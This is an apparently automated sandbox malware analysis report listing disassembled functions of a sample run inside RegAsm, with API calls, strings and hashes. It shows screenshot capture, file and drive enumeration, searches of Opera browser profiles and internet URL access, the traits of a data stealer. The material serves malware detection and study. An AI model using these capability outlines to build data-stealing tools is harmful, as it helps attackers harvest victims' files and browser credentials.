Opcode Fuzzy Hash: 96257d730ce526c9159ba42439116b6d6f8b04f1d2090bc30aa830645dfff910
Instruction Fuzzy Hash: 04829030800248EACF15EBE6DD45BDD7BB8AF15308F5049AEE445732C1EB785B48DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6CBC35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6CC4F688,00001000), ref: 6CBC35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CBC35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6CBC35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CBC363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CBC369F
__aulldiv.LIBCMT ref: 6CBC36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6CBC3773
EnterCriticalSection.KERNEL32(6CC4F688), ref: 6CBC377E
LeaveCriticalSection.KERNEL32(6CC4F688), ref: 6CBC37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6CBC37C4
EnterCriticalSection.KERNEL32(6CC4F688), ref: 6CBC37CB
LeaveCriticalSection.KERNEL32(6CC4F688), ref: 6CBC3801
__aulldiv.LIBCMT ref: 6CBC3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CBC3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CBC3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CBC394C

Strings

MOZ_TIMESTAMP_MODE, xrefs: 6CBC35DB
GenuntelineI, xrefs: 6CBC3639
AuthcAMDenti, xrefs: 6CBC3946
GTC, xrefs: 6CBC3912
QPC, xrefs: 6CBC38FC

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: b8cc7d13f068d661778981354438cb45fe7b4cafdba897d3abe685b1986be3f2
Instruction ID: eaa3be902f830ea8554a4f3cb132b4bd5c0be3fe91a7943ec9e181645a002ac7
Opcode Fuzzy Hash: b8cc7d13f068d661778981354438cb45fe7b4cafdba897d3abe685b1986be3f2
Instruction Fuzzy Hash: 0CB1C271B093509FDB08EF28C85569ABBF5FB8A708F05C92EE899D3750D770D9048B92

Uniqueness

Uniqueness Score: -1.00%

Function 00414B02 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 163
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00414B07
wsprintfA.USER32 ref: 00414B26
FindFirstFileA.KERNEL32(?,?), ref: 00414B3D
StrCmpCA.SHLWAPI(?,00424708), ref: 00414B5A
StrCmpCA.SHLWAPI(?,0042470C), ref: 00414B74
wsprintfA.USER32 ref: 00414B98
StrCmpCA.SHLWAPI(?,00424386), ref: 00414BA9
wsprintfA.USER32 ref: 00414BC6
wsprintfA.USER32 ref: 00414BDA
PathMatchSpecA.SHLWAPI(?,?), ref: 00414BED
lstrcat.KERNEL32(?,?), ref: 00414C19
lstrcat.KERNEL32(?,00424724), ref: 00414C2B
lstrcat.KERNEL32(?,?), ref: 00414C3B
lstrcat.KERNEL32(?,00424728), ref: 00414C4D
lstrcat.KERNEL32(?,?), ref: 00414C61
FindNextFileA.KERNEL32(00000000,?), ref: 00414D2E
FindClose.KERNEL32(00000000), ref: 00414D3D

Strings

%s\%s, xrefs: 00414BD4
%s\%s, xrefs: 00414B92
%s\*, xrefs: 00414B20

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$File$CloseFirstH_prologMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 1348259030-445461498
Opcode ID: f6104c2dab4da46e311747f8bf3ad63da7c6932830f63ebdb05418831eb1be3e
Instruction ID: fbe28ce515bb2e06a57201ea5cde516ba671c9d0ebe51908e249c56a34eea563
Opcode Fuzzy Hash: f6104c2dab4da46e311747f8bf3ad63da7c6932830f63ebdb05418831eb1be3e
Instruction Fuzzy Hash: 7D513971900218ABCF10EFA1EC4AEDE7BBDBB44305F4044AAF509E2190EB399759CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040FFD0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040FFD5
memset.MSVCRT ref: 0040FFFB
GetDesktopWindow.USER32 ref: 00410031
GetWindowRect.USER32(00000000,?), ref: 0041003E
GetDC.USER32(00000000), ref: 00410045
CreateCompatibleDC.GDI32(00000000), ref: 0041004F
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00410060
SelectObject.GDI32(00000000,00000000), ref: 0041006B
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00410087
GlobalFix.KERNEL32(?), ref: 004100E5
GlobalSize.KERNEL32(?), ref: 004100F1

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 004047D3: _EH_prolog.MSVCRT ref: 004047D8
Part of subcall function 004047D3: lstrlen.KERNEL32(00000000), ref: 00404847
Part of subcall function 004047D3: StrCmpCA.SHLWAPI(?,004238D7,004238D3,004238CB,004238C7,004238C6), ref: 004048CA

SelectObject.GDI32(00000000,?), ref: 0041016B
DeleteObject.GDI32(?), ref: 00410186
DeleteObject.GDI32(00000000), ref: 0041018D
ReleaseDC.USER32(00000000,?), ref: 00410197
CloseWindow.USER32(00000000), ref: 0041019E

Strings

image/jpeg, xrefs: 004100A7

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopRectReleaseSizelstrlenmemset
String ID: image/jpeg
API String ID: 747104917-3785015651
Opcode ID: 2b102f18fa7afe3248f14c9948527510fdac01f6f01120ffea66e76ae8f9e6fb
Instruction ID: bd9de6ac73f4a7a6f609941de5bab22e9026c4b34cd2a7132d805df9bc5149a1
Opcode Fuzzy Hash: 2b102f18fa7afe3248f14c9948527510fdac01f6f01120ffea66e76ae8f9e6fb
Instruction Fuzzy Hash: AE5108B2800108EFDF01EFE5ED499EEBBBAFF09314F10412AF515E2160E7394A559BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004143FD Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 133stringfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00414402
wsprintfA.USER32 ref: 00414425
FindFirstFileA.KERNEL32(?,?), ref: 0041443C
StrCmpCA.SHLWAPI(?,004246D8), ref: 0041445E
StrCmpCA.SHLWAPI(?,004246DC), ref: 00414478
lstrcat.KERNEL32(?,?), ref: 004144AD
lstrcat.KERNEL32(?), ref: 004144C0
lstrcat.KERNEL32(?,?), ref: 004144D4
lstrcat.KERNEL32(?,?), ref: 004144E4
lstrcat.KERNEL32(?,004246E0), ref: 004144F6
lstrcat.KERNEL32(?,?), ref: 0041450A

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 00406572: _EH_prolog.MSVCRT ref: 00406577
Part of subcall function 00406572: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0040659A
Part of subcall function 00406572: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004065B1
Part of subcall function 00406572: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004065CD
Part of subcall function 00406572: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004065E7
Part of subcall function 00406572: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406608

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 00412DF0: _EH_prolog.MSVCRT ref: 00412DF5
Part of subcall function 00412DF0: CreateThread.KERNEL32(00000000,00000000,00411D06,?,00000000,00000000), ref: 00412E95
Part of subcall function 00412DF0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00412E9D

FindNextFileA.KERNEL32(00000000,?), ref: 004145A1
FindClose.KERNEL32(00000000), ref: 004145B0

Strings

%s\%s, xrefs: 0041441F

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 2282932919-4073750446
Opcode ID: b0c8b7ae24eac6682157a41998799695e6f71d6d7227d656e36b0534f2e1c5cf
Instruction ID: f5f95e9782e1d6d2acc0624df4689b66a9f9b8f06c65df15221fab16912d6a89
Opcode Fuzzy Hash: b0c8b7ae24eac6682157a41998799695e6f71d6d7227d656e36b0534f2e1c5cf
Instruction Fuzzy Hash: 6C511CB2900219ABCF10EBA1DD49EDE7BBDFF49314F0004AAF509E2150E73897598FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A132 Relevance: 23.4, APIs: 8, Strings: 5, Instructions: 628fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A137

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00423AF3,00000000,?,00000000), ref: 0040A1B6
StrCmpCA.SHLWAPI(?,00423D30), ref: 0040A210
StrCmpCA.SHLWAPI(?,00423D34), ref: 0040A22A
StrCmpCA.SHLWAPI(00000000,Opera,00423B02,00423AFF,00423AFE,00423AFB,00423AFA,00423AF7,00423AF6), ref: 0040A2BD
StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A2D1
StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A2E5

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

Opera GX, xrefs: 0040A2C3
Opera Crypto, xrefs: 0040A2D7
7, xrefs: 0040A940
\*.*, xrefs: 0040A16D
Opera, xrefs: 0040A2AB

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
String ID: 7$Opera$Opera Crypto$Opera GX$\*.*
API String ID: 3869166975-536343317
Opcode ID: 8965ccbdbe7fa21c8b48c5e95518cd90e90e5eb32da80421930c88e88c1170a0
Instruction ID: 6ebbf9666a721d3fa03755d621b76116254f33ce2f7126d776e011497cfe0168
Opcode Fuzzy Hash: 8965ccbdbe7fa21c8b48c5e95518cd90e90e5eb32da80421930c88e88c1170a0
Instruction Fuzzy Hash: E742C630904288EACF05EBE6D955BDC7BB45F28308F5049AEF445732C2EB781B58DB66

Uniqueness

Uniqueness Score: -1.00%

Function 0041418A Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 151stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041418F
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004141F1
memset.MSVCRT ref: 00414210
GetDriveTypeA.KERNEL32(?), ref: 00414219
lstrcpy.KERNEL32(?,00000000), ref: 00414239
lstrcpy.KERNEL32(?,00000000), ref: 00414257

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 00413DF6: _EH_prolog.MSVCRT ref: 00413DFB
Part of subcall function 00413DF6: wsprintfA.USER32 ref: 00413E21
Part of subcall function 00413DF6: FindFirstFileA.KERNEL32(?,?), ref: 00413E38
Part of subcall function 00413DF6: memset.MSVCRT ref: 00413E4F
Part of subcall function 00413DF6: memset.MSVCRT ref: 00413E5D
Part of subcall function 00413DF6: StrCmpCA.SHLWAPI(?,0042464C), ref: 00413E7B
Part of subcall function 00413DF6: StrCmpCA.SHLWAPI(?,00424650), ref: 00413E95
Part of subcall function 00413DF6: wsprintfA.USER32 ref: 00413EB9
Part of subcall function 00413DF6: StrCmpCA.SHLWAPI(?,0042437B), ref: 00413ECA
Part of subcall function 00413DF6: wsprintfA.USER32 ref: 00413EF0
Part of subcall function 00413DF6: memset.MSVCRT ref: 00413F16
Part of subcall function 00413DF6: lstrcat.KERNEL32(?,?), ref: 00413F28
Part of subcall function 00413DF6: strtok_s.MSVCRT ref: 00413F61
Part of subcall function 00413DF6: memset.MSVCRT ref: 00413F76
Part of subcall function 00413DF6: lstrcat.KERNEL32(?,?), ref: 00413F88

lstrcpy.KERNEL32(?,00000000), ref: 0041427A
lstrlen.KERNEL32(?), ref: 004142DC

Strings

%DRIVE_FIXED%, xrefs: 0041425E
*%DRIVE_FIXED%*, xrefs: 004141A3
*%DRIVE_REMOVABLE%*, xrefs: 004141C6
%DRIVE_REMOVABLE%, xrefs: 00414240

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 2879972474-147700698
Opcode ID: f65b1a05f62f356a3ba5328aa0113de8bc88cca3174db758b145c9cbec9576d6
Instruction ID: 793c8504ca780a95aeefd191e2ee800ebac1f872ce797283f8330c7f2d0e83fa
Opcode Fuzzy Hash: f65b1a05f62f356a3ba5328aa0113de8bc88cca3174db758b145c9cbec9576d6
Instruction Fuzzy Hash: 525192B1900248ABDF20EF61DC85EEF7B6DEF50344F00052BF945A3191DB385A85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401140 Relevance: 20.0, APIs: 9, Strings: 2, Instructions: 733fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00401145

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00420334,?,?,?,00420330,?,?,00000000,?,00000000), ref: 0040138A
StrCmpCA.SHLWAPI(?,00420338), ref: 004013A8
StrCmpCA.SHLWAPI(?,0042033C), ref: 004013C2
FindFirstFileA.KERNEL32(00000000,?,?,?,?,00420348,?,?,?,00420344,?,?,?,00420340,?,?), ref: 004014EE

Part of subcall function 0040FA35: SHGetFolderPathA.SHELL32(00000000,f;B,00000000,00000000,?), ref: 0040FA66

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040F870: _EH_prolog.MSVCRT ref: 0040F875
Part of subcall function 0040F870: GetSystemTime.KERNEL32(?,004242A8,00000001,00000000,00000000), ref: 0040F8B5

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 00406572: _EH_prolog.MSVCRT ref: 00406577
Part of subcall function 00406572: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0040659A
Part of subcall function 00406572: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004065B1
Part of subcall function 00406572: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004065CD
Part of subcall function 00406572: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004065E7
Part of subcall function 00406572: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406608

FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,0042034C), ref: 004017C2
FindClose.KERNEL32(00000000,?,?,?,?,?,0042034C), ref: 004017D1
FindNextFileA.KERNEL32(?,?), ref: 00401B16
FindClose.KERNEL32(?), ref: 00401B27

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 00412DF0: _EH_prolog.MSVCRT ref: 00412DF5
Part of subcall function 00412DF0: CreateThread.KERNEL32(00000000,00000000,00411D06,?,00000000,00000000), ref: 00412E95
Part of subcall function 00412DF0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00412E9D

Part of subcall function 0040F9F1: _EH_prolog.MSVCRT ref: 0040F9F6
Part of subcall function 0040F9F1: GetFileAttributesA.KERNEL32(00000000,?,0040D3CF,?,?,?,?), ref: 0040FA0A

Part of subcall function 00406572: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004065FD

Part of subcall function 00412DF0: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 00412E73

Strings

\*.*, xrefs: 0040128D
5, xrefs: 00401AEB

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileH_prolog$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: 5$\*.*
API String ID: 40499504-3045658031
Opcode ID: 7cad23e7cd8eff9178b0579e22ef2d639b5ebe922cf6abc5ae9adf1a3a63ea15
Instruction ID: eb6d6bd8e269dd2983524d24345f17a7fe7000a25cb426269b743fe4d0dcfe39
Opcode Fuzzy Hash: 7cad23e7cd8eff9178b0579e22ef2d639b5ebe922cf6abc5ae9adf1a3a63ea15
Instruction Fuzzy Hash: 77629330804188EACB19E7E6D955BDDBBB85F28308F5049AEF445732C2EF781B58DB25

Uniqueness

Uniqueness Score: -1.00%

Function 0040970D Relevance: 15.3, APIs: 10, Instructions: 301fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00409712

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

FindFirstFileA.KERNEL32(00000000,?,00000000,?,00423CE8,?,?,00423AE7,00000000), ref: 0040978F
StrCmpCA.SHLWAPI(?,00423CEC), ref: 004097AC
StrCmpCA.SHLWAPI(?,00423CF0), ref: 004097C6
StrCmpCA.SHLWAPI(?,00000000,?,?,?,00423CF4,?,?,00423AEA), ref: 0040985D
StrCmpCA.SHLWAPI(?), ref: 004098DB

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 00408A2F: _EH_prolog.MSVCRT ref: 00408A34
Part of subcall function 00408A2F: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?,00423AD7), ref: 00408AE5

FindNextFileA.KERNELBASE(00000000,?), ref: 00409AB2
FindClose.KERNEL32(00000000), ref: 00409AC1

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 322284088-0
Opcode ID: f7293cf8c40abc3ab9183fce139136de42aeed4023b6245af99da8d3f6e5e523
Instruction ID: 9ab5aef411ed1426a2616885b47b2f09622197c1787a99429f030ef60bd985b5
Opcode Fuzzy Hash: f7293cf8c40abc3ab9183fce139136de42aeed4023b6245af99da8d3f6e5e523
Instruction Fuzzy Hash: 18C15370904248EACF00EBA6D9467DD7BB86F19318F50456EF845B32C1EB785B48CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004051CC Relevance: 15.1, APIs: 10, Instructions: 116networkfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004051D1

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 00403E7A: _EH_prolog.MSVCRT ref: 00403E7F
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EB1
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EBA
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EC3
Part of subcall function 00403E7A: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403EDD
Part of subcall function 00403E7A: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403EED

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405220
StrCmpCA.SHLWAPI(?), ref: 0040523A
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 0040525E
